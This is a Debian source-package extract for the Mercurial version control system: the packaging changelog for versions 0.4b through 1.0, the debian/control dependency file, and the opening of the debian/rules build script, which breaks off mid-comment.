unstable; urgency=low * add versionned dependency on ucf due to the use to ucfr (Closes: #479485) * re-add rcs as first alternative of recommands. Discussion about this can be found in #460943 and #479077 (Closes: #479077) -- Vincent Danjean Wed, 21 May 2008 10:04:32 +0200 mercurial (1.0-5) unstable; urgency=low * Add a note in the NEWS file about upstream change for merging conflicts. (Closes: #481553, ) * install mergetools.hgrc system wide (Closes: #481089) * add suggest and documentation for convert extension dependencies (Closes: #477652) -- Vincent Danjean Tue, 20 May 2008 22:46:57 +0200 mercurial (1.0-4) unstable; urgency=low * fix build system so that "hg version" works * fix typos in doc (darcs instead of darc) * remove suggests: for foreign SCM. If someone needs them for the convert extension, they should be already installed (Closes: #476342) -- Vincent Danjean Wed, 16 Apr 2008 10:05:53 +0200 mercurial (1.0-3) unstable; urgency=low * really fix auto-enabling extensions at installation time + be less strict with spaces + reformat the hgext.rc file to be consistent -- Vincent Danjean Tue, 15 Apr 2008 10:32:38 +0200 mercurial (1.0-2) unstable; urgency=low * fix typo in mercurial postinst * remove Suggests to non existant mercurial-web * add lintian-override for non depends on "tk8.4 | wish" in mercurial-common (the Suggests: is in the mercurial package as for all other extensions' dependencies) * fix handling of automatic enabled extension in postinst (they must be disabled in the installed template) * add detection of inotify extension before enabling it (needed on etch that has a too old libc) -- Vincent Danjean Mon, 07 Apr 2008 09:06:04 +0200 mercurial (1.0-1) unstable; urgency=low * new upstream version Closes several Debian bugs: * "hg convert broken" (Closes: #472185) * "hgmerge: uses non-POSIX syntax `type' in /bin/sh script" (Closes: #447094) * "hgmerge: --help option gives a message that ends strangely" (Closes: #443428) * "mercurial: hg/editor interaction leaves a lot of temp files around" (Closes: #472943) * "mercurial: Mercurial merge with meld needs hint" (Closes: #466006) * "glog: tries to close closed fd" (Closes: #454326) * "mercurial: `hg diff` can break UTF-8 encoding" (Closes: #469326) * "Recording mtime after recording commit message leads to hidden (lost) changes" (Closes: #452385) General: * greatly improved merge tool configuration, see "hgrc.5.txt" for details * improved copy/rename handling in diffs, status, and merge * files in .hg inherit permissions from .hg/store * infer --repository when possible, so commands may be run from anywhere. * easy-installable * new "droplet" logo Commands: * archive: disable ".hg_archival.txt" file addition with "ui.archivemeta" * bisect: now built-in with greatly improved performance and usability * bundle: new --all option to bundle the whole repository more easily. * cat: apply decode filters with --decode * clone: can clone from a full-history bundle * commit: warn when creating a new head * debugancestor: index argument is now optional * diff: set the number of context line to show with -U/--unified * grep: display matched revisions commit date with --date * import: new --no-commit and --user options * incoming/outgoing: add --limit option * log: use -b/--only-branch to show revisions of a single branch * remove: improve handling for --after * revert: major speedup * serve: prefix the served path with --prefix (also in [web] section) * status: unknown files are skipped by --quiet * tag: allow multiple tags to be added or removed * tags: --verbose flags local tags * update: switch between named branches without -C Extensions: * churn: promoted to an official extension (previously in contrib) * color: new extension coloring "status" and "qseries" command outputs * convert: * allow synthetic history to be spliced in with --splicemap * support GNU Arch and Monotone sources * svn: allow shallow conversions of single branches with convert.svn.startrev option. * svn: make trunk/branches/tags layout detection more flexible by allowing either of them to be skipped. * svn: preliminary support as a conversion target * hgk: configuration file changed from .gitk to .hgk * highlight: new extension enabling syntax highlighting in hgweb file view (requires pygments) * inotify: new extension using Linux 2.6 inotify API for instant status checking * keyword: new extension for filewise RCS-keyword expansion in working directory * mq: new --currentdate, --date, --currentuser, and --user options * record: add "qrecord" command when used with mq Web interface: * improved WSGI integration and compatibility * follow symlinks in hgwebdir collections * show branches in most of gitweb templates * add line anchors to annotate, changeset, diff and file views * support web.baseurl in hgwebdir, overriding SCRIPT_NAME Hooks: * standard hook to reject text files with CRLF in win32text extension * redirect stdout to stderr for ssh and http servers [ Gerardo Curiel ] * Split package to fix lintian warnings: + mercurial - main package + mercurial-common - Arch-indep bits * Fix clean target * Dropped patches: patches/proposed_upstream__check_hgmerge_args.patch patches/proposed_upstream__type_is_not_posix.patch * patches/deb_specific__use_sensible-editor.patch: Rediff against mercurial 1.0 * hgmerge shell script is not provided anymore * contrib/favicon.ico is not provided anymore * Deleted obsolete link_hgit target from debian/rules * Added mergetools.hgrc to the examples directory * Added logo-droplets.svg to /usr/share/mercurial * Added new extensions to the hgext.rc file + hgext.color (not enabled by default) + hgext.highlight (not enabled by default) + hgext.inotify (enabled, Closes: #472583) + hgext.keyword (not enabled by default) * Removed extensions from the hgext.rc file + hgext.hbisect (now provided as a built-in command) * Added new suggested dependencies : + python-pygments (needed for hgext/highlight.py) + python-elementtree (for darcs conversion) [ Vincent Danjean ] * import mercurial in the Python Application Packaging Team project * debian/control: + add PAPT in the Uploaders field + add Vcs-* fields + add conflicts/replaces fields to ensure proper upgrade for mercurial-common * cleanup debian/ files + remove unneeded debian/*.{dirs} files * move examples/ in usr/share/doc/mercurial (in the mercurial-common package) * manage hgext.rc with ucf. Enabling some extensions only if their dependencies are present * put all usr/share/python-support/* in mercurial-common instead of mercurial. This trigger a lintian warning but this is an error (see #473428) [ Piotr Ożarowski ] * New recommended packages: + python-mysqldb (hgext/bugzilla.py) + python-openssl (hgweb/server.py) * New suggested packages: + python-flup (contrib/hgwebdir.fcgi, Closes: #466731) [ William Pitcock ] * patches/deb_specific__use_sensible-editor.patch: +Rediff against 1.0 branch. -- Vincent Danjean Mon, 07 Apr 2008 00:11:40 +0200 mercurial (0.9.5-3) unstable; urgency=low * [debian/control] + Recommends rcs first (and before kdiff3) as hgmerge use it in first (and does not use another program if it exists) (Closes: #460943) As an additionnal value, rcs has really fewer dependencies + Move Homepage: from description to source stanza + Suggest qct instead of commit-tool (better developed upstream) + Bump standard-version to 3.7.3 (no change needed) + Add python-elementtree to suggest (needed for hg convert with darcs repo) (Closes: 459353) Should be removed when debian will switch to python2.5 (as it is included in it) + move tk8.4 | wish from recommends to suggests as it is needed by an extension (hgk) and not by the core package * [debian/README] + document that extension dependencies are listed as Suggests: * [debian/patches/deb_specific__use_VISUAL_envvar.patch] Rewrite the patch using sensible-editor (Closes: 448376) and rename it to deb_specific__use_sensible-editor.patch * [debian/rule] + rewrite the fix for cdbs/dh_python so that we depend on the current python version (Closes: #456556) -- Vincent Danjean Mon, 21 Jan 2008 20:57:27 +0100 mercurial (0.9.5-2) unstable; urgency=low * Apply patch to change 'hgext/' into 'hgext.' when loading an extension Current config files use the documented syntax (ie 'hgext.extname=') Users can use 'hgext/extname=' in their hgrc if they want to (Closes: #447088) -- Vincent Danjean Fri, 02 Nov 2007 11:59:03 +0100 mercurial (0.9.5-1) unstable; urgency=low * New upstream release Closes: #435636 (erroneous multiple heads after commit) Closes: #427808 (hgweb/hgwebdir do not work with flup (FastCGI)) Closes: #418780 (partial hgweb listings) Closes: #440175 (please include record extension) Closes: #447663 (0.9.5 available) Closes: #427851 (RSS feeds have wrong URL with https) New features: * Handle symlinks on systems without symlink support * hg archive supports symlinks * Display executable/symlink bit with "hg manifest -v" (see UpgradeNotes) * Improved hg verify diagostics * Faster revlog handling * Faster handling of large directories * Greatly improved handling of large files * Atom syndication support in hgweb * Improved test suite with parallel execution Fixes: * Fixes for some file copy and rename corner cases * Allow moving newly-added files before commit * Improve hg diff whitespace handling * Disallow fast-forward merge with an ancestor * Fix adding untracked files on directory renames * Fix hg archive %r format specifier * Fix re: and glob: patterns in .hgignore * Improve hg executable path resolution * Many options and hgrc parsing improvements * Better handling of VFAT filesystems on Linux * Fix tgz archival on Windows * Fix hg serve on Windows requiring pywin32 modules * Fix --profile under Windows New extensions: * alias - allow user-defined command aliases * children - show the children of the given or working dir revision * imerge - incremental interactive merging * interhg - modify changelog text as in InterWiki * record - darcs-style interactive change selection during commit New extension features: * convert * Now supports Subversion, Darcs and Mercurial as source SCMs * Use clone's behaviour for the default destination name * Force encoding to UTF-8 for converted repository * Support new-style .cvspass file format * Filter the files and directories to import * Remap paths to new locations during import * hgk * Fix hgk stopping because of untrusted repository warnings * Handle filenames with spaces * Improved documentation * mq * Autodetect --git patches on qrefresh * Improve README.Debian about Emacs Closes: #446972 (mercurial.el: autoload) Thanks to Trent W. Buck for its explainations added to the README.Debian * Apply several patches to hgmerge: - use /bin/bash for hgmerge: 'type' is not POSIX (Closes: #447094) - patch hgmerge to do minimum check of its arguments (Closes: #443428) - use $VISUAL and default to 'editor' instead of 'vi' (Closes: #447095, #448376) [mercurial/command.py modified too] * Correct wrong link to web docs in README.Debian (Closes: #425841) * [debian/control] Recommends: meld (used to hgmerge) (Closes: #316347) -- Vincent Danjean Mon, 29 Oct 2007 10:22:45 +0100 mercurial (0.9.4-1) unstable; urgency=low * New upstream release (Closes: #430714) + New features: * support for symlinks * improved tag handling * improved merge handling of file and directory renames * improved named branch usability * numerous improvements to commands * generic pre- and post-command hooks * improved Windows support * basic BeOS and OpenVMS support * numerous bug fixes + New extensions and contributions: * extensions can now be specified in .hg/hgrc * new convert extension with CVS support * new graphlog extension * improved patchbomb extension * example FastCGI script -- Vincent Danjean Wed, 27 Jun 2007 00:33:27 +0200 mercurial (0.9.3-2) unstable; urgency=low * [debian/rule, debian/control] remove workaround for symlink support in python-support and bump dependency of python-support (>= 0.4.3) * [debian/rule] use default python interpreter as 2.4 is the default now * [debian/mercurial.postinst] remove old /usr/lib/python*/site-packages/{mercurial,hgext} directories if needed (Closes: #382252) * forgot to closes: #382185 since 0.9.2 upstream release (hgrc manual does not say [smtp] host is optional any more) -- Vincent Danjean Wed, 3 Jan 2007 14:22:10 +0100 mercurial (0.9.3-1) unstable; urgency=low * New upstream release + Bug fixes: - fix a merge copy/rename corner case - fix spurious new heads message with push -r - fix hg export %n sequence numbers - fix shell quoting on Windows - fix charset encoding for hgwebdir and obfuscated addresses - fix missing generated files for distribution tarball - fix convert-repo tag updates and transcoding of committer - add instructions for redoing failed merges + Documentation fixes: - hg cat, manifest, and tag default to current parent revision. - CGI stub comments clarified - corrected synopses for many commands - improve doc building and distribution - convert-repo: update usage information + Extension fixes: - mq: fix strip on Windows - mq: fix some guards corner cases - gpg: make 'hg sign' default to current parent -- Vincent Danjean Tue, 19 Dec 2006 11:25:55 +0100 mercurial (0.9.2-3) unstable; urgency=low * remove debian/patches/submitted_upstream__restore_hgk.py.patch as it is now included in the release (and avoid to use a old hgk.py with a recent hg) (Closes: #403282) -- Vincent Danjean Sat, 16 Dec 2006 15:51:13 +0100 mercurial (0.9.2-2) unstable; urgency=low * [debian/rules] add support for python2.5 * [README.Debian] update list of default extensions -- Vincent Danjean Thu, 14 Dec 2006 15:26:10 +0100 mercurial (0.9.2-1) unstable; urgency=low * New upstream release + New features: - merge now follows renames and copies - new layout protects against case-insensitivity issues - new branch and branches commands for managing named branches - push command accepts -r for pushing specified heads or named branches - proper storage of changelog and other metadata in UTF-8 - log, annotate and grep '--follow' follow renames and copies - date parsing is improved and log, update, and revert accept --date ranges - additional command options for log, status, addremove - improved schema for hgweb URLs - bundle can now use '-r' and '--base' removing the need of an base repository - support for git-style extended patches with --git option - new debuginstall command to check for common installation issues + New contributions and extensions: - mq - support for quilt-style guards - can import existing changesets into mq ('qimport -r') or commit mq patches as regular changesets ('qdel -f') - edit the log message with 'qrefresh -e' - rename patches with 'qrename' - qheader to display the patch header of particular patches, and '--summary' for qseries, qapplied, qunapplied and qtop - combine patches with 'qfold' - qrefresh supports pattern options to import only a subset of the changes into a patch, to help split changes into multiple patches - patch names for applied patches act like local tags, and can be used in the revision arguments of any hg command - hgk - browse a subset of the history with '--limit' and revision range arguments - shows revision numbers as well as node hashes - churn: graph lines of code changed per user over a range of history - patchbomb: generate inline attachments with '-a' + Behavior changes: - hg cat defaults to the working directory revision rather than tip - hg manifest no longer shows internal file revision hashes by default - hg revert now requires the -a flag to revert all files + Developer notes: - new high-level API functions in the 'hg' module - new context API simplifies many operations - The changelog can now include arbitrary metadata in key: value form * [debian]: include the churn extension and enable it by default -- Vincent Danjean Thu, 14 Dec 2006 13:05:01 +0100 mercurial (0.9.1+20061210+8c24b6fd5866-1) experimental; urgency=low * New upstream release snapshot before 0.9.2 release * [debian/control] : update maintainer field : I'am DD now :-) -- Vincent Danjean Sun, 10 Dec 2006 22:40:30 +0100 mercurial (0.9.1-1) unstable; urgency=low * New upstream release Major changes between Mercurial 0.9 and 0.9.1: New features: - You can now configure your 'hgweb' server to let remote users 'push' changes over http. - You can now 'import' a patch in a mail message by saving the mail message, and importing it. This works for patches sent either inline or as attachments. - The 'diff' command now accepts '-rA:B' syntax as a synonym for '-r A -r B', and adds '-b' and '-B' options. New contributions and extensions: - The 'acl' extension lets you lock down parts of a repository against incoming changes - The 'extdiff' extension lets you run your favourite graphical change viewer - Comprehensive integration with the 'vim' editor - A restricted shell for 'ssh'-hosted repositories - An importer for 'darcs' repositories New hooks added: - 'preupdate' is run before an update or merge in the working directory. - 'update' is run after an update or merge in the working directory. Behaviour changes: - NOTE: Mercurial as installed by the Windows binary installer no longer performs automatic line-ending conversion for Unix/Linux compatibility. To re-enable this feature, edit your 'mercurial.ini' file after you upgrade. - The Windows binary installer now automatically adds 'hg' to your '%PATH%'. - The 'backout' command now runs an editor by default, to let you modify the commit message for a backed-out changeset. - An earlier problem with parsing of tags has been fixed. This makes tag parsing slower but more reliable. Memory usage and performance improvements: - The 'remove' command has been rewritten to be hundreds of times faster in large repositories. - It is now possible to 'clone' a repository very quickly over a LAN, if the server is configured to allow it. See the new 'server' section in the 'hgrc' documentation. Other changes of note: - Mercurial will now print help for an extension if you type 'hg help EXT_NAME'. - The usual array of bug fixes and documentation improvements. - The integrated web server is now more WSGI-compliant. - Work has begun to solidify Mercurial's API for use by third-party packages. -- Vincent Danjean Tue, 25 Jul 2006 19:21:13 +0200 mercurial (0.9-9) unstable; urgency=low * Force the use of python2.4 with a sed command. A race condition on some autobuilders makes that workaround needed. (Really closes: #378835) -- Vincent Danjean Thu, 20 Jul 2006 17:59:35 +0200 mercurial (0.9-8) unstable; urgency=low * do not use default python but python2.4 instead for hg : most code is python2.3 compatible (so we still compile .py files for pyhton2.3) but "hg help" need features for python2.4 Closes: #378835 Thanks David Douard for reporting this. * adding missing manpage hgignore (Closes: #378502) Thanks Baruch Even for reporting this. * remove hack in postinst (dpkg not replacing directory by symlink) as it is no more useful (directory was in /usr/lib/python2.3, symlink in now in /usr/lib/python2.4) * Create symlinks for the templates directory within the mercurial directory (and not in another python serch path) (Closes: #378538) -- Vincent Danjean Wed, 19 Jul 2006 12:25:30 +0200 mercurial (0.9-7) unstable; urgency=low * mercurial will use the default python interpreter -- Vincent Danjean Tue, 11 Jul 2006 23:12:14 +0200 mercurial (0.9-6) unstable; urgency=low * update to the new python policy * reenable the fix for #362487 as python2.3 is useable again -- Vincent Danjean Tue, 4 Jul 2006 00:19:50 +0200 mercurial (0.9-5) unstable; urgency=low * call dh_python with -V 2.4 argument -- Vincent Danjean Mon, 29 May 2006 09:18:53 +0200 mercurial (0.9-4) unstable; urgency=low * [debian/copyright] add copyright for Debian packaging * [debian/NEWS] talk about python2.3->python2.4 transition -- Vincent Danjean Wed, 17 May 2006 00:28:48 +0200 mercurial (0.9-3) unstable; urgency=low * [debian/compat] debhelper compat version dumped to 5 -- Vincent Danjean Sun, 14 May 2006 21:27:43 +0200 mercurial (0.9-2) unstable; urgency=low * fix a bug in update/revert (patch from Vadim Gelfer already applied upstream) * [debian/control] build-depend on python as dh_python require it (package did not fail to build due to an indirect build-dependency but it is safer like that) -- Vincent Danjean Fri, 12 May 2006 19:30:44 +0200 mercurial (0.9-1) unstable; urgency=low * New upstream release Major changes between Mercurial 0.8.1 and 0.9: - The repository file format has been improved. - This has resulted in an average 40% reduction in disk space usage. - The new format (called RevlogNG) is now the default. - Mercurial works perfectly with both the old and new repository file formats. It can transfer changes transparently between repositories of either format. - To use the new repository format, simply use `hg clone --pull` to clone an existing repository. - Note: Versions 0.8.1 and earlier of Mercurial cannot read RevlogNG repositories directly, but they can `clone`, `pull` from, and `push` to servers that are serving RevlogNG repositories. - Memory usage has been improved by over 50% for many common operations. - Substantial performance improvements on large repositories. - New commands: - 'archive' - generate a directory tree snapshot, tarball, or zip file of a revision - Deprecated commands: - 'addremove' - replaced by 'add' and 'remove --after' - 'forget' - replaced by 'revert' - 'undo' - replaced by 'rollback' - New extensions: - Bugzilla integration hook - Email notification hook - Nested repositories are now supported. Mercurial will not recurse into a subdirectory that contains a '.hg' directory. It is treated as a separate repository. - The standalone web server, 'hg serve', is now threaded, so it can talk to multiple clients at a time. - The web server can now display a "message of the day". - Support added for hooks written in Python. - Many improvements and clarifications to built-in help. * [debian/control] set Standard-Version to 3.7.2 (no changes required) -- Vincent Danjean Thu, 11 May 2006 01:00:03 +0200 mercurial (0.8.1-6) unstable; urgency=low * cleanup patches applied on top of upstream sources send the interesting one to upstream before the 0.9 release -- Vincent Danjean Thu, 27 Apr 2006 03:20:24 +0200 mercurial (0.8.1-5) unstable; urgency=low * use python2.4 instead of standard python (2.3 for now): this allows to use hglib backend with tailor * several minor fixes so that tailor works with the 'hglib' backend these are submitted upstream * hardcode python interpreter in script instead of using /usr/bin/env as suggested by the python policy * remove previous hack (dpkg not replacing directory by symlink) as it is no more useful (directory was in /usr/lib/python2.3, symlink in now in /usr/lib/python2.4) -- Vincent Danjean Mon, 17 Apr 2006 12:21:24 +0200 mercurial (0.8.1-4) unstable; urgency=low * directory doesn't get replaced by symlink (Closes: #362487) and dpkg does not say anything ! Thanks Norbert Tretkowski -- Vincent Danjean Fri, 14 Apr 2006 00:38:10 +0200 mercurial (0.8.1-3) unstable; urgency=low * Really fix #361897 (Thanks Darren Salt again) -- Vincent Danjean Wed, 12 Apr 2006 20:33:45 +0200 mercurial (0.8.1-2) unstable; urgency=low * Fix new tag syntax for hgk. Thanks Darren Salt (Closes: #361897) -- Vincent Danjean Tue, 11 Apr 2006 13:25:04 +0200 mercurial (0.8.1-1) unstable; urgency=low * New upstream release Major changes from 0.8 to 0.8.1: - new extensions: mq (manage a queue of patches, like quilt only better) (Closes: #343824) email (send changes as series of email patches) - new command: merge (replaces "update -m") - improved commands: log (--limit option added), pull/push ("-r" works on specific revisions), revert (rewritten, much better) - comprehensive hook support - output templating added, supporting e.g. GNU changelog style - Windows, Mac OS X: prebuilt binary packages, better support - many reliability, performance, and memory usage improvements -- Vincent Danjean Mon, 10 Apr 2006 22:09:16 +0200 mercurial (0.8-3) unstable; urgency=low * Fix typo in long description -- Vincent Danjean Tue, 4 Apr 2006 03:30:22 +0200 mercurial (0.8-2) unstable; urgency=low * Add documentation about extensions packaged for Debian. -- Vincent Danjean Tue, 31 Jan 2006 11:14:52 +0100 mercurial (0.8-1) unstable; urgency=low * New upstream release Major changes from 0.7 to 0.8: - faster status, diff, and commit - reduced memory usage for push and pull - improved extension API - new bisect, gpg, hgk, and win32text extensions - short URLs, binary file handling, and optional gitweb skin for hgweb - numerous new command options including log --keyword and pull --rev - improved hooks and file filtering -- Vincent Danjean Mon, 30 Jan 2006 16:06:34 +0100 mercurial (0.7+20060110+0d36e3d7e2ea-1) experimental; urgency=low * package test to try upstream sources before 0.8 -- Vincent Danjean Tue, 10 Jan 2006 22:47:38 +0100 mercurial (0.7-8) unstable; urgency=low * Closes: #343459: correct FAQ URL * Closes: #343458: fix directory completion * Closes: #343472: clone does not work with path aliases (Thanks Daniel Kobras for these three bugreports with patch) -- Vincent Danjean Tue, 3 Jan 2006 21:13:23 +0100 mercurial (0.7-7) unstable; urgency=low * Add support for alias st for hg status (Closes: #340235) (backport from tip, thanks Michael Gebetsroither ) -- Vincent Danjean Tue, 22 Nov 2005 13:01:39 +0100 mercurial (0.7-6) unstable; urgency=low * Backport of the patch "fix handling of daylight saving time" from upstream (Closes: #336646) -- Vincent Danjean Wed, 2 Nov 2005 06:17:04 +0100 mercurial (0.7-5) unstable; urgency=low * Add hgweb.cgi and hgwebdir.cgi in examples (Closes: #332973) -- Vincent Danjean Sat, 15 Oct 2005 11:24:54 +0200 mercurial (0.7-4) unstable; urgency=low * backport from upstream of - use of 'hgext' directory for extensions - 'hgk.py' extension (was hgit before) => 'hg view' works ;-) * add 'Recommands: wish' for the hgk extension -- Vincent Danjean Fri, 23 Sep 2005 11:45:13 +0200 mercurial (0.7-3) unstable; urgency=low * Add system-wide config directory (so that extensions can be easyly added) * Enable hgit extension -- Vincent Danjean Tue, 20 Sep 2005 02:47:16 +0200 mercurial (0.7-2) unstable; urgency=low * Correct changelog.Debian (I forgot to add upstream changes in the previous entry) -- Vincent Danjean Sun, 18 Sep 2005 22:46:14 +0200 mercurial (0.7-1) unstable; urgency=low * New upstream release (Closes: #328725) core improved merge logic improved copy/rename support (still experimental) automatic binary file handling generic file filtering support various performance improvements command line new bundle/unbundle commands for exchanging native updates more natural support for remove, copy, and rename faster, more powerful log command new grep command for searching entire history support for plug-in extensions improved exception handling and debugging facilities hgweb optional downloading of tarballs and zip files Windows support hardlinking support newline conversion through file filtering contrib updated hgk * New package (a bit delayed due to a crash disk and a new job) * Upstream added support for options -h and --help (Closes: #324049) * renamming conffile 'bash_completion' to 'mercurial' (Closes: #325266) -- Vincent Danjean Sat, 17 Sep 2005 16:54:37 +0200 mercurial (0.6c-1) unstable; urgency=low * New upstream release What's new: core functionality ability to use tags to identify branches detect adding new heads with push protocol versioning for push/pull https: support minor merge fixes command line much more powerful path handling incoming/outgoing commands smarter import/export fewer long, confusing hashes to deal with many new command options and settings portability improved portability of test suite and support scripts improved Windows support web interface easy to set up multiple repository interface several new hgrc config options IPv6 support documentation improved built-in help and man pages a steadily growing wiki tutorial in multiple languages extras a highly functional bash auto-completion script a new Emacs mode -- Vincent Danjean Tue, 23 Aug 2005 11:01:36 +0200 mercurial (0.6b-2) unstable; urgency=low * Adds proper python dependencies * Recommends tkdiff or kdiff3 for merge purpose * Suggests meld as this is another merging program that can be used by mercurial (but this needs the user set the HGMERGE variable) * Closes: #316347: Please Recommands: meld -- Vincent Danjean Wed, 17 Aug 2005 10:33:33 +0200 mercurial (0.6b-1) unstable; urgency=low * New upstream release What's new: improved ui new clone command replaces mkdir+init+pull+update new revert command add range support and -p option to log to show patches tags command now supports local tags improved push and pull better exception and signal handling improved option parsing support for user-defined hooks (aka triggers) performance updates even faster import of large sets of patches faster delta generation faster annotate faster status and ignore improved web interface more conformant and compatible HTML output built-in RSS feeds better tags handling fast multiple keyword search portability work support for Windows is nearly complete should easily compile and install on any modern UNIX comes with RPM spec file and script and more doc and help updates improved test suite numerous bug fixes and cleanups -- Vincent Danjean Tue, 12 Jul 2005 11:45:13 +0200 mercurial (0.6-2) unstable; urgency=low * Add meld to Suggest as it is not used by default hgmerge (Closes: #316347: Please Recommands: meld) -- Vincent Danjean Thu, 30 Jun 2005 16:30:33 +0200 mercurial (0.6-1) unstable; urgency=low * New upstream release This release contains a huge number of improvements: improved source tracking multi-head support permission tracking rename and copy tracking improved tag handling friendlier, more robust command line interface integrated help faster startup better exception handling smarter three-way merge helper improved communication faster outstanding changeset detection SSH-based push support non-transparent proxy support improved configuration handling support for .hgrc and .hg/hgrc files save per-repo defaults for pull new delta extension faster, smaller, and simpler than GNU diff or xdiff faster commit, push/pull, and annotate improved interoperability convert-repo framework for importing from other SCMs can work with gitk and git-viz portability improvements tested on big and little-endian 32 and 64-bit UNIX platforms Windows support is nearly complete and much more numerous performance tweaks and bugfixes automated test suite updated docs and FAQ -- Vincent Danjean Sat, 25 Jun 2005 00:15:13 +0200 mercurial (0.5b+20050618-1) unstable; urgency=low * New upstream sources (tip 396:8f8bb77d560e70bcc95577e4dfa877df18d876ab) this fix a alignment bug reported on alpha * many others fix and improvments from upstream * Change short description Closes: #314577: Please spell out the abbreviation in the synopsis -- Vincent Danjean Sat, 18 Jun 2005 10:02:39 +0200 mercurial (0.5b+20050612-2) unstable; urgency=low * Fix spelling mistake (thanks Emanuele Aina) Closes: #314161: Small spelling error in documentation * New package that should solve the FTBFS due to the use of the boggus package debhelper 4.9.0 by autobuilders Closes: #313491: mercurial_0.5b+20050612-1: FTBFS: syntax error at /usr/bin/dh_strip line 191, near 'if' * Closes: #314577: Please spell out the abbreviation in the synopsis -- Vincent Danjean Fri, 17 Jun 2005 11:14:06 +0200 mercurial (0.5b+20050612-1) unstable; urgency=low * New upstream sources -- Vincent Danjean Sun, 12 Jun 2005 11:40:02 +0200 mercurial (0.5b-5) unstable; urgency=low * manually fix wrong build-dependencies that have been previously generated by cdbs (ie remove 'build-essential' and duplicates) -- Vincent Danjean Sat, 4 Jun 2005 09:16:40 +0200 mercurial (0.5b-4) unstable; urgency=low * remove automatic generation of control from control.in (with cdbs dependencies) as requested by ftpmaster to accept this NEW package (see still opened bugs #311724 for more information) -- Vincent Danjean Fri, 3 Jun 2005 08:57:06 +0200 mercurial (0.5b-3) unstable; urgency=low * First official Debian release. (Closes: #308873: ITP: mercurial -- scalable distributed SCM) -- Vincent Danjean Thu, 2 Jun 2005 08:55:53 +0200 mercurial (0.5b-2) unstable; urgency=low * package description improved from the mercurial ML * Add Homepage: to long description (thanks Anibal Monsalve Salazar) * Change Architecture from all to any as mercurial sources now have C files to compile (thanks Anibal Monsalve Salazar) * Update copyright (thanks Anibal Monsalve Salazar) * Add rcs and tkdiff to Recommands as hgmerge use it (only recommands and not depends because if the user set HGMERGE to kdiff3, he does not need them) * use hgmerge if HGMERGE is not set (patch submitted upstream) -- Vincent Danjean Wed, 1 Jun 2005 11:35:20 +0200 mercurial (0.5b-1) unstable; urgency=low * New upstream release -- Vincent Danjean Tue, 31 May 2005 00:00:29 +0200 mercurial (0.5-1) unstable; urgency=low * New upstream release -- Vincent Danjean Sun, 29 May 2005 21:36:55 +0200 mercurial (0.4f-1) unstable; urgency=low * New upstream release * english improved in description (thanks Jay Berkenbilt ) -- Vincent Danjean Sat, 14 May 2005 00:55:40 +0200 mercurial (0.4e-3) unstable; urgency=low * package description improved (thanks Bas Zoetekouw ) -- Vincent Danjean Fri, 13 May 2005 13:46:44 +0200 mercurial (0.4e-2) unstable; urgency=low * update description -- Vincent Danjean Thu, 12 May 2005 23:32:43 +0200 mercurial (0.4e-1) unstable; urgency=low * New upstream release -- Vincent Danjean Thu, 12 May 2005 23:13:54 +0200 mercurial (0.4b-2) unstable; urgency=low * add debian watch file * add depend on tkdiff * correct some lintian warnings -- Vincent Danjean Fri, 29 Apr 2005 12:59:33 +0200 mercurial (0.4b-1) unstable; urgency=low * Initial Release. -- Vincent Danjean Fri, 29 Apr 2005 08:54:25 +0200 debian/control0000664000000000000000000000502312266004045010572 0ustar Source: mercurial Section: vcs Priority: optional Maintainer: Ubuntu Developers XSBC-Original-Maintainer: Python Applications Packaging Team Uploaders: Vincent Danjean , Javi Merino , Tristan Seligmann Build-Depends: debhelper (>= 9), patchutils (>= 0.2.25), gettext, python-all-dev (>= 2.6.6-3~), python-docutils, python-roman, zip, unzip, bash-completion, netbase, Standards-Version: 3.9.5 Homepage: http://mercurial.selenic.com/ Vcs-Svn: svn://anonscm.debian.org/python-apps/packages/mercurial/trunk/ Vcs-Browser: http://anonscm.debian.org/viewvc/python-apps/packages/mercurial/trunk/ X-Python-Version: >= 2.4 XS-Testsuite: autopkgtest Package: mercurial-common Architecture: all Depends: ${misc:Depends}, ${python:Depends} Recommends: mercurial (>= ${source:Version}), ca-certificates Suggests: wish, python-mysqldb, python-pygments, python-openssl Breaks: mercurial (<< ${source:Version}) Replaces: mercurial (<< 1.4) Description: easy-to-use, scalable distributed version control system (common files) Mercurial is a fast, lightweight Source Control Management system designed for efficient handling of very large distributed projects. . This package contains the architecture independent components of Mercurial, and is generally useless without the mercurial package. Package: mercurial Architecture: any Depends: ${shlibs:Depends}, ${misc:Depends}, ${python:Depends}, ucf (>= 2.0020), mercurial-common (= ${source:Version}) Recommends: openssh-client, wish, Suggests: qct, vim | emacs, kdiff3 | kdiff3-qt | kompare | meld | tkcvs | mgdiff Breaks: hgsubversion (<< 1.5~), hgview (<< 1.7.1-1~), mercurial-git (<< 0.4.0-1~), qct (<< 1.7-2~), Description: easy-to-use, scalable distributed version control system Mercurial is a fast, lightweight Source Control Management system designed for efficient handling of very large distributed projects. . Its features include: * O(1) delta-compressed file storage and retrieval scheme * Complete cross-indexing of files and changesets for efficient exploration of project history * Robust SHA1-based integrity checking and append-only storage model * Decentralized development model with arbitrary merging between trees * High-speed HTTP-based network merge protocol * Easy-to-use command-line interface * Integrated stand-alone web interface * Small Python codebase . This package contains the architecture dependent files. debian/rules0000775000000000000000000001037112540325036010252 0ustar #!/usr/bin/make -f # -*- mode: makefile; coding: utf-8 -*- # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 %: dh $@ --with python2,bash-completion PYVERS=$(shell pyversions -vs) PYVER_DEFAULT=$(shell pyversions -vd) DEB_HOST_ARCH := $(shell dpkg-architecture -qDEB_HOST_ARCH) override_dh_auto_build: $(MAKE) all # Do not start a line with a word with a dot in a manpage sed -i -e 's,^[.]\(hgignore\|hg/hgrc\),\\fP\1,' doc/hg.1 ifneq (,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) NJOBS := $(patsubst parallel=%,%,$(filter parallel=%,$(DEB_BUILD_OPTIONS))) PARALLEL_TEST_JOBS := --jobs $(NJOBS) endif ARCH_IS_MIPS := $(if $(subst mips,,$(DEB_HOST_ARCH)),,T) ARCH_IS_KFREEBSD-i386 := $(if $(subst kfreebsd-i386,,$(DEB_HOST_ARCH)),,T) ARCH_IS_ARMEL := $(if $(subst armel,,$(DEB_HOST_ARCH)),,T) ARCH_IS_SPARC := $(if $(subst sparc,,$(DEB_HOST_ARCH)),,T) override_dh_auto_test: ifeq (,$(filter nocheck,$(DEB_BUILD_OPTIONS))) # test-pull-pull-corruption tries to execute two hg commands at the # same time to test for corruption. It does so by running an hg # command in the background, sleeping one second and running the # second command. In architectures with slow buildds, one second is # not enough and the second test starts before the first one has # started printing. This is hacky and we just enhance the hack by # incrementing the sleep time in those architectures. 